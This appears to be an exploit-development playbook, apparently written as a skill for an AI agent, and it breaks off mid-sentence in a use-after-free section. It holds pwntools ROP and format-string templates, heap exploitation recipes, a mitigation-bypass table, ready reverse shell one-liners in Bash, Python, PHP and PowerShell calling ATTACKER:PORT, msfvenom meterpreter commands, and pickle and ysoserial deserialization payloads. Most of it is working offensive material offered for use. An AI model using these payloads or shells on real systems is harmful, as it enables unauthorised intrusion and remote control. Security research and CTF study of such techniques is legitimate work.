Exploit Development
When to Activate
- Confirmed vulnerability needs working PoC
- Binary exploitation (stack/heap overflow, format string, UAF)
- Web exploitation requiring custom payloads
- Bypass of security mitigations (ASLR, DEP, canaries, CFI)
- Shellcode development for specific architectures
Binary Exploitation
Stack Buffer Overflow
from pwn import *
# Template: stack overflow with ROP
elf = ELF('./vulnerable')
rop = ROP(elf)
libc = ELF('./libc.so.6')
# Find offset
offset = cyclic_find(core.fault_addr) # or pattern_offset
# Leak libc address
rop.puts(elf.got['puts'])
rop.call(elf.symbols['main']) # return to main for second stage
payload = flat(
b'A' * offset,
rop.chain()
)
# Stage 2: calculate libc base, call system("/bin/sh")
libc.address = leaked_puts - libc.symbols['puts']
rop2 = ROP(libc)
rop2.system(next(libc.search(b'/bin/sh\x00')))
payload2 = flat(
b'A' * offset,
rop2.chain()
)
Heap Exploitation
# tcache poisoning (glibc 2.26+)
# 1. Allocate chunks A, B
# 2. Free B, Free A (tcache: A -> B)
# 3. Allocate, overwrite A's fd pointer to target
# 4. Allocate twice — second allocation at target address
# House of Force (old glibc)
# Overwrite top chunk size to -1
# Calculate distance to target
# malloc(distance) consumes wilderness
# Next malloc returns target address
# Fastbin dup
# Free A, Free B, Free A (fastbin: A -> B -> A)
# Allocate with fd = target (must have valid size at target-0x8)
Format String Exploitation
# Read: %p %p %p ... (leak stack/libc addresses)
# Write: %n writes number of chars printed so far
# Targeted write: %{offset}$n writes to specific argument
# pwntools fmtstr_payload:
from pwn import fmtstr_payload
payload = fmtstr_payload(offset, {target_addr: value}, write_size='short')
ROP Chain Construction
# Find gadgets
ropper --file ./binary --search "pop rdi"
ROPgadget --binary ./binary --ropchain
one_gadget ./libc.so.6 # one-shot execve gadgets
# Common ROP patterns:
# ret2libc: pop rdi; ret -> "/bin/sh" -> system
# ret2csu: __libc_csu_init gadgets for multi-arg calls
# Stack pivot: xchg rsp, rax; ret (pivot to controlled buffer)
# SROP: sigreturn to set all registers
Mitigation Bypass
| Mitigation | Bypass Technique |
|---|
| ASLR | Info leak (format string, partial overwrite, brute force 12-bit on 32-bit) |
| DEP/NX | ROP, ret2libc, mprotect() to make region executable |
| Stack Canary | Info leak, overwrite only specific vars, thread-local canary overwrite |
| PIE | Partial overwrite (last 12 bits fixed), info leak base address |
| CFI | Dispatch gadgets, COOP (counterfeit OOP), JIT spray |
| RELRO (Full) | Overwrite __malloc_hook, __free_hook (old glibc), exit handlers, TLS-dtor |
| Seccomp | Allowed syscall abuse, kernel bugs, TOCTOU on syscall args |
Web Exploitation Payloads
Reverse Shells
# Bash
bash -i >& /dev/tcp/ATTACKER/PORT 0>&1
# Python
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("ATTACKER",PORT));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'
# PHP
php -r '$sock=fsockopen("ATTACKER",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
# PowerShell
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER',PORT);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}"
Shellcode Generation
# Linux x64 reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=PORT -f python -b '\x00'
# Windows x64 meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=PORT -f csharp -e x64/xor_dynamic
# Shellcode constraints:
# - Null-free: avoid \x00 (use xor encoding, sub instead of mov 0)
# - Alphanumeric: only [A-Za-z0-9] (use alpha_mixed encoder)
# - Size-limited: use egg hunter or staged payload
Deserialization Exploits
# Python pickle RCE
import pickle, os
class Exploit:
def __reduce__(self):
return (os.system, ('id',))
payload = pickle.dumps(Exploit())
# Java (ysoserial)
# java -jar ysoserial.jar CommonsCollections6 'command' | base64
# PHP
# O:8:"Exploit":1:{s:4:"cmd";s:2:"id";}
# .NET (ysoserial.net)
# ysoserial.exe -g TypeConfuseDelegate -f Json.Net -c "command"
Exploit Quality Standards
- PoC must be reliable (>90% success rate stated)
- Document exact versions/conditions required
- Include pre-exploitation checks (version fingerprint)
- Provide cleanup steps post-exploitation
- Note detection indicators for blue team awareness
Advanced: Modern Heap Exploitation
tcache Poisoning (glibc 2.26-2.35)
from pwn import *
# tcache: per-thread cache, singly-linked list, LIFO
# No integrity checks in glibc < 2.32
# glibc 2.32+: safe-linking (XOR fd with heap address >> 12)
# Classic tcache poisoning:
# 1. Allocate A, B (same tcache bin)
# 2. Free A, Free B → tcache: B → A
# 3. Overwrite B's fd pointer (via UAF or overflow) to target
# 4. malloc() returns B, next malloc() returns target address
# 5. Write arbitrary data at target
# Safe-linking bypass (glibc 2.32+):
# fd is stored as: (fd_addr >> 12) ^ next_ptr
# Need heap leak to calculate: real_fd = leak ^ (target_addr)
# Formula: encrypted_fd = (chunk_addr >> 12) ^ target_addr
House of Apple (glibc 2.35+)
# Modern technique when __malloc_hook/__free_hook are removed (glibc 2.34+)
# Target: _IO_FILE structures (stdout/stderr/stdin)
# House of Apple 2:
# 1. Get arbitrary write primitive (heap overflow, UAF)
# 2. Corrupt _IO_list_all to point to fake FILE structure
# 3. Fake FILE has: _wide_data → _wide_vtable → controlled function pointer
# 4. Trigger: exit() or FSOP (File Stream Oriented Programming)
# 5. Code execution via _IO_wstr_overflow or _IO_wdefault_xsputn
# Key structures:
# struct _IO_FILE_plus { _IO_FILE file; _IO_jump_t *vtable; }
# vtable is checked against valid range (__libc_IO_vtables section)
# BUT: _wide_vtable is NOT checked → use _IO_wfile_jumps as target
House of Einherjar (Heap Consolidation)
# Exploit backward consolidation in glibc
# 1. Overflow null byte into next chunk's prev_inuse flag
# 2. Set fake prev_size to trick free() into consolidating
# 3. Overlapping chunks → read/write freed chunk metadata
# 4. Tcache/fastbin poisoning from overlapping region
# Requirements: single null byte overflow (off-by-one)
# Result: overlapping heap chunks → controlled metadata corruption
House of Botcake (tcache + unsorted bin)
# Combine tcache and unsorted bin for double-free without detection
# 1. Fill tcache (7 entries for size)
# 2. Free chunk A → goes to unsorted bin
# 3. Free chunk B (adjacent) → consolidates with A in unsorted bin
# 4. Empty tcache entries
# 5. Free chunk B again → B is now in BOTH unsorted bin AND tcache
# 6. Allocate from unsorted bin (get consolidated A+B)
# 7. Overwrite B's fd in tcache → arbitrary write
Advanced: Type Confusion & UAF Patterns
Browser-Style Type Confusion
// V8 (Chrome) type confusion pattern:
// Objects have a "map" (hidden class) that describes their layout
// Type confusion: make engine think object A has type B's map
// Access fields at wrong offsets → OOB read/write
// JIT confusion:
// 1. Create object with type A (known layout)
// 2. JIT compiler optimizes based on type A's map
// 3. Change object's map to type B (different field offsets)
// 4. JIT'd code accesses wrong memory → OOB
// Exploitation:
// Type confusion → OOB access → read/write primitive →
// fake object → addrof/fakeobj → arbitrary R/W →
// overwrite JIT page → shellcode execution
Use-After-Free Exploitation
// Classic UAF pattern:
// 1. Allocate object (e.g., 0x80 bytes)
// 2. Store function pointer or vtable in object
// 3. Free object (memory returned to allocat
